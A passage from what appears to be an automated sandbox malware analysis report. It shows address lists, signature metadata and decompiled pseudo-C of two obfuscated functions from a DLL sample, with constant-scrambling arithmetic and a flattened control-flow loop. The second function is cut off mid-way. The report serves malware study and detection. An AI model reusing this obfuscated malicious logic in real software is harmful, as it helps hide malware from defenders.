                                                                                                          0x02afb924
                                                                                                          0x02afb925
                                                                                                          0x02afb92b
                                                                                                          0x02afb930
                                                                                                          0x02afb932
                                                                                                          0x02afb937
                                                                                                          0x02afb93d
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c2
                                                                                                          0x02afb8c6
                                                                                                          0x02afb8cb
                                                                                                          0x02afb8cb
                                                                                                          0x00000000
                                                                                                          0x02afb8cb
                                                                                                          0x02afb8c2
                                                                                                          0x02afb937
                                                                                                          0x02afb90b
                                                                                                          0x02afb903
                                                                                                          0x02afb8fb
                                                                                                          0x02afb8f3
                                                                                                          0x02afbb95
                                                                                                          0x02afbb95
                                                                                                          0x00000000
                                                                                                          0x02afbb95
                                                                                                          0x02afba4f
                                                                                                          0x02afbb3c
                                                                                                          0x02afbb3d
                                                                                                          0x02afbb43
                                                                                                          0x02afbb48
                                                                                                          0x02afbb4a
                                                                                                          0x02afbb4f
                                                                                                          0x02afbb5b
                                                                                                          0x00000000
                                                                                                          0x02afbb51
                                                                                                          0x02afbb51
                                                                                                          0x00000000
                                                                                                          0x02afbb51
                                                                                                          0x02afba55
                                                                                                          0x02afba5b
                                                                                                          0x02afbb17
                                                                                                          0x02afbb1c
                                                                                                          0x00000000
                                                                                                          0x02afba61
                                                                                                          0x02afba67
                                                                                                          0x02afbada
                                                                                                          0x02afbadf
                                                                                                          0x02afbae7
                                                                                                          0x00000000
                                                                                                          0x02afba69
                                                                                                          0x02afba6b
                                                                                                          0x02afba9c
                                                                                                          0x02afbac3
                                                                                                          0x02afbacd
                                                                                                          0x02afbad2
                                                                                                          0x02afbb60
                                                                                                          0x02afbb60
                                                                                                          0x02afbb60
                                                                                                          0x00000000
                                                                                                          0x02afba6b
                                                                                                          0x02afba67
                                                                                                          0x02afba5b
                                                                                                          0x00000000
                                                                                                          0x02afba4f
                                                                                                          0x02afb8cb
                                                                                                          0x02afb8c6

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: s4$&-$+V$E!$[7$[D$bu${u$B
                                                                                                          • API String ID: 0-2389712741
                                                                                                          • Opcode ID: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
                                                                                                          • Instruction ID: 258a49378934e021634b0fee3c1938864c6fd213a1257e406840e885e7fba401
                                                                                                          • Opcode Fuzzy Hash: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
                                                                                                          • Instruction Fuzzy Hash: E22225B2508380DFD3A8DF65C589A4BBBF2BBC4708F10891DE6D986260D7B58949CF53
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEC6B8, Relevance: 11.7, Strings: 9, Instructions: 423COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 95%
                                                                                                          			E02AEC6B8() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t478;
				void* _t479;
				intOrPtr _t482;
				intOrPtr _t486;
				signed int _t494;
				intOrPtr* _t497;
				signed int _t501;
				intOrPtr _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				void* _t513;
				void* _t522;
				void* _t562;
				signed int _t564;
				signed int* _t568;

				_t568 =  &_v1764;
				_v1588 = 0x57daab;
				_v1588 = _v1588 + 0x535a;
				_v1588 = _v1588 ^ 0x00582e2c;
				_v1756 = 0x11011b;
				_v1756 = _v1756 | 0x986fcb94;
				_v1756 = _v1756 + 0xffff0812;
				_v1756 = _v1756 | 0x2bc6aa33;
				_v1756 = _v1756 ^ 0x3bfefbb2;
				_v1652 = 0x5adeab;
				_v1652 = _v1652 + 0xffff93f0;
				_v1652 = _v1652 ^ 0xbf2e951e;
				_v1652 = _v1652 ^ 0xbf74e787;
				_v1668 = 0x1eca4f;
				_v1668 = _v1668 + 0x52c;
				_v1568 = 0;
				_v1668 = _v1668 * 0xb;
				_t562 = 0xbc1c7ad;
				_v1668 = _v1668 ^ 0x0152ea48;
				_v1584 = 0x89d737;
				_v1584 = _v1584 + 0xffff9374;
				_v1584 = _v1584 ^ 0x0082a8e0;
				_v1672 = 0x7da8ac;
				_v1672 = _v1672 >> 0xf;
				_v1672 = _v1672 | 0x438c492a;
				_v1672 = _v1672 ^ 0x438e7d89;
				_v1636 = 0xa2c3bd;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x051ae408;
				_v1720 = 0x328717;
				_v1720 = _v1720 << 0xc;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x9e9a;
				_v1720 = _v1720 ^ 0x2e0b4663;
				_v1760 = 0x4b7b55;
				_t57 =  &_v1760; // 0x4b7b55
				_t504 = 0x6f;
				_v1760 =  *_t57 / _t504;
				_v1760 = _v1760 >> 0xb;
				_t505 = 0x66;
				_t564 = 6;
				_push("true");
				_v1760 = _v1760 * 0x46;
				_v1760 = _v1760 ^ 0x00015e15;
				_v1740 = 0xf42b27;
				_v1740 = _v1740 / _t505;
				_pop(_t506);
				_v1740 = _v1740 * 0x3b;
				_v1740 = _v1740 / _t564;
				_v1740 = _v1740 ^ 0x00118050;
				_v1680 = 0x69fb04;
				_v1680 = _v1680 / _t506;
				_v1680 = _v1680 + 0x2a45;
				_v1680 = _v1680 ^ 0x000477f2;
				_v1624 = 0xeefab1;
				_v1624 = _v1624 << 0xb;
				_v1624 = _v1624 ^ 0x77d908fd;
				_v1688 = 0x983026;
				_v1688 = _v1688 ^ 0xf9038374;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 ^ 0xf3384871;
				_v1656 = 0xbd9fd7;
				_v1656 = _v1656 | 0x34570662;
				_v1656 = _v1656 << 0xf;
				_v1656 = _v1656 ^ 0xcff19553;
				_v1724 = 0xb73e9;
				_v1724 = _v1724 + 0xffff2aba;
				_t507 = 0x1b;
				_v1724 = _v1724 * 0x2b;
				_v1724 = _v1724 + 0xffffc5c3;
				_v1724 = _v1724 ^ 0x01cec31d;
				_v1732 = 0xfb07a0;
				_v1732 = _v1732 + 0xfffff0a2;
				_v1732 = _v1732 ^ 0xe8e4881c;
				_v1732 = _v1732 + 0xfffffa8c;
				_v1732 = _v1732 ^ 0xe819b6c9;
				_v1664 = 0x98c4f6;
				_v1664 = _v1664 / _t507;
				_v1664 = _v1664 + 0xffffc9a9;
				_v1664 = _v1664 ^ 0x000722b9;
				_v1704 = 0x7b43f4;
				_v1704 = _v1704 + 0x33bf;
				_v1704 = _v1704 ^ 0xbdcd0236;
				_v1704 = _v1704 ^ 0xbdbcc173;
				_v1600 = 0x907d1c;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x000f3001;
				_v1608 = 0x549b29;
				_v1608 = _v1608 + 0xffff560f;
				_v1608 = _v1608 ^ 0x005a0ce7;
				_v1648 = 0x53669a;
				_t508 = 0x60;
				_v1648 = _v1648 * 0x53;
				_v1648 = _v1648 * 0x2d;
				_v1648 = _v1648 ^ 0xc0c27601;
				_v1616 = 0xf6b3f;
				_v1616 = _v1616 << 0xf;
				_v1616 = _v1616 ^ 0xb591763f;
				_v1712 = 0xd11a2f;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 + 0x34a7;
				_v1712 = _v1712 + 0xffffa6d8;
				_v1712 = _v1712 ^ 0x001715b5;
				_v1744 = 0x782a81;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 >> 3;
				_v1744 = _v1744 * 0x57;
				_v1744 = _v1744 ^ 0x00239f7e;
				_v1728 = 0xdf27c0;
				_v1728 = _v1728 + 0xb655;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 | 0x1084c50a;
				_v1728 = _v1728 ^ 0x10890bcf;
				_v1612 = 0xd31e5c;
				_v1612 = _v1612 / _t508;
				_v1612 = _v1612 ^ 0x000f28c0;
				_v1640 = 0xad59ab;
				_v1640 = _v1640 ^ 0x540bc483;
				_v1640 = _v1640 ^ 0x54aa6eab;
				_v1596 = 0xfc600e;
				_v1596 = _v1596 << 1;
				_v1596 = _v1596 ^ 0x01f16920;
				_v1676 = 0x70f7b6;
				_v1676 = _v1676 >> 1;
				_v1676 = _v1676 | 0x834faa8e;
				_v1676 = _v1676 ^ 0x837cfefc;
				_v1580 = 0xc67f49;
				_v1580 = _v1580 ^ 0x220388f4;
				_v1580 = _v1580 ^ 0x22cc2a29;
				_v1604 = 0xf53a42;
				_v1604 = _v1604 + 0x1d20;
				_v1604 = _v1604 ^ 0x00fba671;
				_v1764 = 0x3c20a1;
				_v1764 = _v1764 << 0xa;
				_v1764 = _v1764 | 0xcc5879dc;
				_v1764 = _v1764 + 0x7d87;
				_v1764 = _v1764 ^ 0xfcd01767;
				_v1736 = 0xfcd131;
				_v1736 = _v1736 | 0xb098ccc9;
				_v1736 = _v1736 + 0x1f04;
				_v1736 = _v1736 | 0xe0e1c446;
				_v1736 = _v1736 ^ 0xf0fbfa39;
				_v1684 = 0x6ca78a;
				_v1684 = _v1684 >> 0xd;
				_t509 = 0x5d;
				_v1684 = _v1684 / _t509;
				_v1684 = _v1684 ^ 0x00062aae;
				_v1576 = 0x28ea20;
				_t510 = 0x2d;
				_v1576 = _v1576 / _t510;
				_v1576 = _v1576 ^ 0x000e137d;
				_v1632 = 0x34444a;
				_v1632 = _v1632 + 0xb7da;
				_v1632 = _v1632 ^ 0x00330b1f;
				_v1748 = 0x707d69;
				_v1748 = _v1748 << 0xb;
				_v1748 = _v1748 ^ 0xb1536161;
				_v1748 = _v1748 + 0xffff04ff;
				_v1748 = _v1748 ^ 0x32b99598;
				_v1696 = 0x3e2d26;
				_v1696 = _v1696 + 0x9f8b;
				_v1696 = _v1696 + 0xf840;
				_v1696 = _v1696 ^ 0x00305f5f;
				_v1700 = 0x43ad40;
				_t511 = 0x7e;
				_v1700 = _v1700 / _t511;
				_v1700 = _v1700 + 0x17b0;
				_v1700 = _v1700 ^ 0x000023e6;
				_v1628 = 0x615af9;
				_v1628 = _v1628 | 0xc5f525fd;
				_v1628 = _v1628 ^ 0xc5f01915;
				_v1752 = 0xf7a5b1;
				_v1752 = _v1752 | 0xfe49737c;
				_v1752 = _v1752 + 0x9fc0;
				_v1752 = _v1752 ^ 0x9fa1c746;
				_v1752 = _v1752 ^ 0x60a54bb7;
				_v1572 = 0x7bbdbf;
				_t512 = 0xe;
				_v1572 = _v1572 * 0x2d;
				_v1572 = _v1572 ^ 0x15c0521a;
				_v1620 = 0xd84802;
				_v1620 = _v1620 ^ 0x3749a239;
				_v1620 = _v1620 ^ 0x37909643;
				_v1644 = 0xebc394;
				_v1644 = _v1644 << 8;
				_v1644 = _v1644 ^ 0xebca8902;
				_v1692 = 0x3d115c;
				_v1692 = _v1692 ^ 0xaeae6a77;
				_v1692 = _v1692 >> 0x10;
				_v1692 = _v1692 ^ 0x000f7307;
				_v1660 = 0x8a3dcc;
				_v1660 = _v1660 ^ 0x1263d9af;
				_v1660 = _v1660 / _t512;
				_v1660 = _v1660 ^ 0x015f4699;
				_v1592 = 0x64d88c;
				_v1592 = _v1592 ^ 0xc97cb881;
				_v1592 = _v1592 ^ 0xc91c2e76;
				_v1708 = 0x9c1e71;
				_v1708 = _v1708 ^ 0xd16e05af;
				_v1708 = _v1708 | 0x50445732;
				_v1708 = _v1708 << 5;
				_v1708 = _v1708 ^ 0x3ec99884;
				_v1716 = 0xd3e518;
				_v1716 = _v1716 + 0xffff72ee;
				_t501 = _v1568;
				_v1716 = _v1716 / _t564;
				_v1716 = _v1716 << 0xa;
				_v1716 = _v1716 ^ 0x8cea7ffc;
				while(1) {
					L1:
					_t513 = 0x5c;
					while(1) {
						L2:
						_t478 = 0x5243326;
						do {
							L3:
							if(_t562 == 0x22d4857) {
								_push(_v1688);
								_push(_v1624);
								_push(_v1680);
								_t479 = E02AFE1F8(0x2ae1030, _v1740, __eflags);
								E02AE7078( &_v520, __eflags);
								_t482 =  *0x2b06214; // 0x0
								_t486 =  *0x2b06214; // 0x0
								__eflags = _t486 + 0x34;
								E02AEF96F(_v1656, _t486 + 0x34, _t486 + 0x34, _t479,  &_v520, _v1724,  &_v1560, _t482 + 0x23c, _v1732, _v1664, _v1704,  &_v1040);
								E02AFFECB(_t479, _v1600, _v1608, _v1648, _v1616);
								_t568 =  &(_t568[0x10]);
								_t562 = 0x6f5d8c5;
								goto L19;
							} else {
								if(_t562 == 0x3a11f46) {
									_push(_v1612);
									_push(_v1728);
									_push(_v1744);
									__eflags = E02AE2DEA(_v1640,  &_v1564, _v1596, 0x2ae10a0, _v1756, _v1676, 0x2ae10a0, 0x2ae10a0, _v1580, _v1604, 0x2ae10a0, 0x2ae10a0, _v1652, _v1764, _v1736, _v1684, _v1576, E02AFE1F8(0x2ae10a0, _v1712, __eflags));
									_t562 =  ==  ? 0x5243326 : 0xbc3e7f;
									E02AFFECB(_t490, _v1632, _v1748, _v1696, _v1700);
									_t568 =  &(_t568[0x16]);
									L19:
									_t478 = 0x5243326;
									_t513 = 0x5c;
									goto L20;
								} else {
									if(_t562 == _t478) {
										_t494 = E02AF00C5( &_v1560, _v1628, _v1752);
										_pop(_t522);
										_t497 = E02AF2CD9(_v1572, _t501,  &_v1560, _t522, _v1564, _v1668, _v1620, 2 + _t494 * 2, _v1644, _v1692, _v1660);
										_t568 =  &(_t568[9]);
										__eflags = _t497;
										_t562 = 0xcd5a5d6;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t562 == 0x6f5d8c5) {
											_t502 =  *0x2b06214; // 0x0
											_t503 = _t502 + 0x23c;
											while(1) {
												__eflags =  *_t503 - _t513;
												if(__eflags == 0) {
													break;
												}
												_t503 = _t503 + 2;
												__eflags = _t503;
											}
											_t501 = _t503 + 2;
											_t562 = 0x3a11f46;
											goto L2;
										} else {
											if(_t562 == 0xbc1c7ad) {
												E02AE1A34(_v1584,  &_v1040, _t513, _t513, _v1672, _v1636, _v1720, _t513, _v1588, _v1760);
												_t568 =  &(_t568[8]);
												_t562 = 0x22d4857;
												while(1) {
													L1:
													_t513 = 0x5c;
													L2:
													_t478 = 0x5243326;
													goto L3;
												}
											} else {
												if(_t562 != 0xcd5a5d6) {
													goto L20;
												} else {
													E02AE53D0(_v1592, _v1708, _v1716, _v1564);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1568;
							L20:
							__eflags = _t562 - 0xbc3e7f;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}
















































































                                                                                                          0x02aec6b8
                                                                                                          0x02aec6be
                                                                                                          0x02aec6cb
                                                                                                          0x02aec6d8
                                                                                                          0x02aec6e3
                                                                                                          0x02aec6eb
                                                                                                          0x02aec6f3
                                                                                                          0x02aec6fb
                                                                                                          0x02aec703
                                                                                                          0x02aec70b
                                                                                                          0x02aec713
                                                                                                          0x02aec71b
                                                                                                          0x02aec723
                                                                                                          0x02aec72b
                                                                                                          0x02aec733
                                                                                                          0x02aec73b
                                                                                                          0x02aec74b
                                                                                                          0x02aec74f
                                                                                                          0x02aec754
                                                                                                          0x02aec75c
                                                                                                          0x02aec767
                                                                                                          0x02aec772
                                                                                                          0x02aec77d
                                                                                                          0x02aec785
                                                                                                          0x02aec78a
                                                                                                          0x02aec792
                                                                                                          0x02aec79a
                                                                                                          0x02aec7a5
                                                                                                          0x02aec7ad
                                                                                                          0x02aec7b8
                                                                                                          0x02aec7c0
                                                                                                          0x02aec7c5
                                                                                                          0x02aec7ca
                                                                                                          0x02aec7d2
                                                                                                          0x02aec7da
                                                                                                          0x02aec7e2
                                                                                                          0x02aec7e8
                                                                                                          0x02aec7ed
                                                                                                          0x02aec7f3
                                                                                                          0x02aec7fd
                                                                                                          0x02aec800
                                                                                                          0x02aec801
                                                                                                          0x02aec803
                                                                                                          0x02aec807
                                                                                                          0x02aec80f
                                                                                                          0x02aec81f
                                                                                                          0x02aec828
                                                                                                          0x02aec829
                                                                                                          0x02aec835
                                                                                                          0x02aec839
                                                                                                          0x02aec841
                                                                                                          0x02aec84f
                                                                                                          0x02aec853
                                                                                                          0x02aec85b
                                                                                                          0x02aec863
                                                                                                          0x02aec86e
                                                                                                          0x02aec876
                                                                                                          0x02aec881
                                                                                                          0x02aec889
                                                                                                          0x02aec891
                                                                                                          0x02aec895
                                                                                                          0x02aec89f
                                                                                                          0x02aec8a7
                                                                                                          0x02aec8af
                                                                                                          0x02aec8b4
                                                                                                          0x02aec8bc
                                                                                                          0x02aec8c4
                                                                                                          0x02aec8d3
                                                                                                          0x02aec8d6
                                                                                                          0x02aec8da
                                                                                                          0x02aec8e2
                                                                                                          0x02aec8ea
                                                                                                          0x02aec8f2
                                                                                                          0x02aec8fa
                                                                                                          0x02aec902
                                                                                                          0x02aec90a
                                                                                                          0x02aec912
                                                                                                          0x02aec922
                                                                                                          0x02aec926
                                                                                                          0x02aec92e
                                                                                                          0x02aec936
                                                                                                          0x02aec93e
                                                                                                          0x02aec946
                                                                                                          0x02aec94e
                                                                                                          0x02aec956
                                                                                                          0x02aec961
                                                                                                          0x02aec969
                                                                                                          0x02aec974
                                                                                                          0x02aec97f
                                                                                                          0x02aec98a
                                                                                                          0x02aec995
                                                                                                          0x02aec9a8
                                                                                                          0x02aec9a9
                                                                                                          0x02aec9b8
                                                                                                          0x02aec9bf
                                                                                                          0x02aec9ca
                                                                                                          0x02aec9d5
                                                                                                          0x02aec9dd
                                                                                                          0x02aec9e8
                                                                                                          0x02aec9f0
                                                                                                          0x02aec9f5
                                                                                                          0x02aec9fd
                                                                                                          0x02aeca05
                                                                                                          0x02aeca0d
                                                                                                          0x02aeca15
                                                                                                          0x02aeca1a
                                                                                                          0x02aeca24
                                                                                                          0x02aeca28
                                                                                                          0x02aeca30
                                                                                                          0x02aeca38
                                                                                                          0x02aeca40
                                                                                                          0x02aeca45
                                                                                                          0x02aeca4d
                                                                                                          0x02aeca55
                                                                                                          0x02aeca69
                                                                                                          0x02aeca70
                                                                                                          0x02aeca7b
                                                                                                          0x02aeca86
                                                                                                          0x02aeca91
                                                                                                          0x02aeca9c
                                                                                                          0x02aecaa7
                                                                                                          0x02aecaae
                                                                                                          0x02aecab9
                                                                                                          0x02aecac1
                                                                                                          0x02aecac5
                                                                                                          0x02aecacd
                                                                                                          0x02aecad5
                                                                                                          0x02aecae0
                                                                                                          0x02aecaeb
                                                                                                          0x02aecaf6
                                                                                                          0x02aecb03
                                                                                                          0x02aecb0e
                                                                                                          0x02aecb19
                                                                                                          0x02aecb21
                                                                                                          0x02aecb26
                                                                                                          0x02aecb2e
                                                                                                          0x02aecb36
                                                                                                          0x02aecb3e
                                                                                                          0x02aecb46
                                                                                                          0x02aecb4e
                                                                                                          0x02aecb56
                                                                                                          0x02aecb5e
                                                                                                          0x02aecb66
                                                                                                          0x02aecb6e
                                                                                                          0x02aecb79
                                                                                                          0x02aecb7e
                                                                                                          0x02aecb84
                                                                                                          0x02aecb8c
                                                                                                          0x02aecb9e
                                                                                                          0x02aecba3
                                                                                                          0x02aecbac
                                                                                                          0x02aecbb7
                                                                                                          0x02aecbc2
                                                                                                          0x02aecbcd
                                                                                                          0x02aecbd8
                                                                                                          0x02aecbe0
                                                                                                          0x02aecbe5
                                                                                                          0x02aecbed
                                                                                                          0x02aecbf5
                                                                                                          0x02aecbfd
                                                                                                          0x02aecc05
                                                                                                          0x02aecc0d
                                                                                                          0x02aecc15
                                                                                                          0x02aecc1d
                                                                                                          0x02aecc29
                                                                                                          0x02aecc2e
                                                                                                          0x02aecc34
                                                                                                          0x02aecc3c
                                                                                                          0x02aecc44
                                                                                                          0x02aecc4f
                                                                                                          0x02aecc5a
                                                                                                          0x02aecc65
                                                                                                          0x02aecc6d
                                                                                                          0x02aecc75
                                                                                                          0x02aecc7d
                                                                                                          0x02aecc85
                                                                                                          0x02aecc8d
                                                                                                          0x02aecca0
                                                                                                          0x02aecca1
                                                                                                          0x02aecca8
                                                                                                          0x02aeccb3
                                                                                                          0x02aeccbe
                                                                                                          0x02aeccc9
                                                                                                          0x02aeccd4
                                                                                                          0x02aeccdf
                                                                                                          0x02aecce7
                                                                                                          0x02aeccf2
                                                                                                          0x02aeccfa
                                                                                                          0x02aecd02
                                                                                                          0x02aecd07
                                                                                                          0x02aecd0f
                                                                                                          0x02aecd17
                                                                                                          0x02aecd25
                                                                                                          0x02aecd29
                                                                                                          0x02aecd33
                                                                                                          0x02aecd43
                                                                                                          0x02aecd4e
                                                                                                          0x02aecd59
                                                                                                          0x02aecd61
                                                                                                          0x02aecd69
                                                                                                          0x02aecd71
                                                                                                          0x02aecd76
                                                                                                          0x02aecd7e
                                                                                                          0x02aecd86
                                                                                                          0x02aecd94
                                                                                                          0x02aecd9b
                                                                                                          0x02aecd9f
                                                                                                          0x02aecda4
                                                                                                          0x02aecdac
                                                                                                          0x02aecdac
                                                                                                          0x02aecdae
                                                                                                          0x02aecdaf
                                                                                                          0x02aecdaf
                                                                                                          0x02aecdaf
                                                                                                          0x02aecdb4
                                                                                                          0x02aecdb4
                                                                                                          0x02aecdba
                                                                                                          0x02aecfa1
                                                                                                          0x02aecfaa
                                                                                                          0x02aecfb1
                                                                                                          0x02aecfb9
                                                                                                          0x02aecfc7
                                                                                                          0x02aecfe8
                                                                                                          0x02aed00e
                                                                                                          0x02aed013
                                                                                                          0x02aed018
                                                                                                          0x02aed03b
                                                                                                          0x02aed040
                                                                                                          0x02aed043
                                                                                                          0x00000000
                                                                                                          0x02aecdc0
                                                                                                          0x02aecdc2
                                                                                                          0x02aecef5
                                                                                                          0x02aecf01
                                                                                                          0x02aecf05
                                                                                                          0x02aecf71
                                                                                                          0x02aecf91
                                                                                                          0x02aecf94
                                                                                                          0x02aecf99
                                                                                                          0x02aed048
                                                                                                          0x02aed04a
                                                                                                          0x02aed04f
                                                                                                          0x00000000
                                                                                                          0x02aecdc8
                                                                                                          0x02aecdca
                                                                                                          0x02aece91
                                                                                                          0x02aece96
                                                                                                          0x02aeced5
                                                                                                          0x02aecedc
                                                                                                          0x02aecedf
                                                                                                          0x02aecee1
                                                                                                          0x02aecee9
                                                                                                          0x00000000
                                                                                                          0x02aecdd0
                                                                                                          0x02aecdd6
                                                                                                          0x02aece5f
                                                                                                          0x02aece65
                                                                                                          0x02aece70
                                                                                                          0x02aece70
                                                                                                          0x02aece73
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aece6d
                                                                                                          0x02aece6d
                                                                                                          0x02aece6d
                                                                                                          0x02aece75
                                                                                                          0x02aece78
                                                                                                          0x00000000
                                                                                                          0x02aecddc
                                                                                                          0x02aecde2
                                                                                                          0x02aece4d
                                                                                                          0x02aece52
                                                                                                          0x02aece55
                                                                                                          0x02aecdac
                                                                                                          0x02aecdac
                                                                                                          0x02aecdae
                                                                                                          0x02aecdaf
                                                                                                          0x02aecdaf
                                                                                                          0x00000000
                                                                                                          0x02aecdaf
                                                                                                          0x02aecde4
                                                                                                          0x02aecdea
                                                                                                          0x00000000
                                                                                                          0x02aecdf0
                                                                                                          0x02aece06
                                                                                                          0x02aece0c
                                                                                                          0x02aecdea
                                                                                                          0x02aecde2
                                                                                                          0x02aecdd6
                                                                                                          0x02aecdca
                                                                                                          0x02aecdc2
                                                                                                          0x02aece0d
                                                                                                          0x02aece1e
                                                                                                          0x02aed050
                                                                                                          0x02aed050
                                                                                                          0x02aed050
                                                                                                          0x00000000
                                                                                                          0x02aed05c
                                                                                                          0x02aecdaf

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ($,.X$2WDP$E*$JD4$U{K$__0$i}p$#
                                                                                                          • API String ID: 0-2449995950
                                                                                                          • Opcode ID: 6ef5ae6c7bdb820aee1dca510fe1b70c2bcc15bb830ca6e541702c82f92ea522
                                                                                                          • Instruction ID: 9e805219e489562fe4e38f5e54131cdd49822ef12349b71b7c11dd58ab226465
                                                                                                          • Opcode Fuzzy Hash: 6ef5ae6c7bdb820aee1dca510fe1b70c2bcc15bb830ca6e541702c82f92ea522
                                                                                                          • Instruction Fuzzy Hash: 2622237150C3809FD7A8CF65C58AA8FBBF2BBC4758F10891DE19986260DBB58549CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFE955, Relevance: 11.6, Strings: 9, Instructions: 300COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 97%
                                                                                                          			E02AFE955() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				unsigned int _v708;
				signed int _t316;
				void* _t319;
				intOrPtr _t320;
				intOrPtr _t323;
				intOrPtr _t328;
				void* _t331;
				void* _t334;
				void* _t335;
				char _t342;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				unsigned int* _t372;

				_t372 =  &_v708;
				_v576 = 0xda0c08;
				_v576 = _v576 + 0xffff47d7;
				_t335 = 0x67615db;
				_v576 = _v576 ^ 0x00d953de;
				_v616 = 0x1aa62a;
				_v616 = _v616 ^ 0x887273cb;
				_v616 = _v616 ^ 0x8868d4e1;
				_v696 = 0x6cc5ff;
				_v696 = _v696 + 0xffff0f33;
				_v696 = _v696 + 0xffffebff;
				_v696 = _v696 + 0xffff9323;
				_v696 = _v696 ^ 0x006b5457;
				_v620 = 0xd441f6;
				_v620 = _v620 >> 2;
				_v620 = _v620 ^ 0x0035107d;
				_v668 = 0xe6e8c4;
				_v668 = _v668 + 0xffff0cc3;
				_v668 = _v668 | 0x11364c4e;
				_v668 = _v668 ^ 0x11fae4e7;
				_v664 = 0xedeede;
				_v664 = _v664 + 0x8dc4;
				_v664 = _v664 >> 0xb;
				_v664 = _v664 ^ 0x00096569;
				_v644 = 0x7bf23b;
				_v644 = _v644 + 0x7679;
				_v644 = _v644 << 2;
				_v644 = _v644 ^ 0x01f0e7c7;
				_v588 = 0xd55e4f;
				_v588 = _v588 >> 8;
				_v588 = _v588 ^ 0x000a9525;
				_v648 = 0x4b711e;
				_v648 = _v648 + 0xffff1f62;
				_v648 = _v648 ^ 0xa93f12d6;
				_v648 = _v648 ^ 0xa9763896;
				_v584 = 0xdb5f0a;
				_v584 = _v584 * 0x19;
				_t334 = 0;
				_v584 = _v584 ^ 0x156e4d85;
				_v608 = 0x3263c9;
				_v608 = _v608 + 0xe60;
				_v608 = _v608 ^ 0x0036f835;
				_v640 = 0x3b5ffd;
				_t365 = 0x46;
				_v640 = _v640 * 5;
				_v640 = _v640 / _t365;
				_v640 = _v640 ^ 0x000ce458;
				_v708 = 0xb95ed6;
				_t366 = 0x5a;
				_v708 = _v708 / _t366;
				_v708 = _v708 ^ 0x64dff63e;
				_v708 = _v708 >> 0x10;
				_v708 = _v708 ^ 0x000970e9;
				_v672 = 0xda5c0b;
				_v672 = _v672 >> 5;
				_v672 = _v672 * 0x6e;
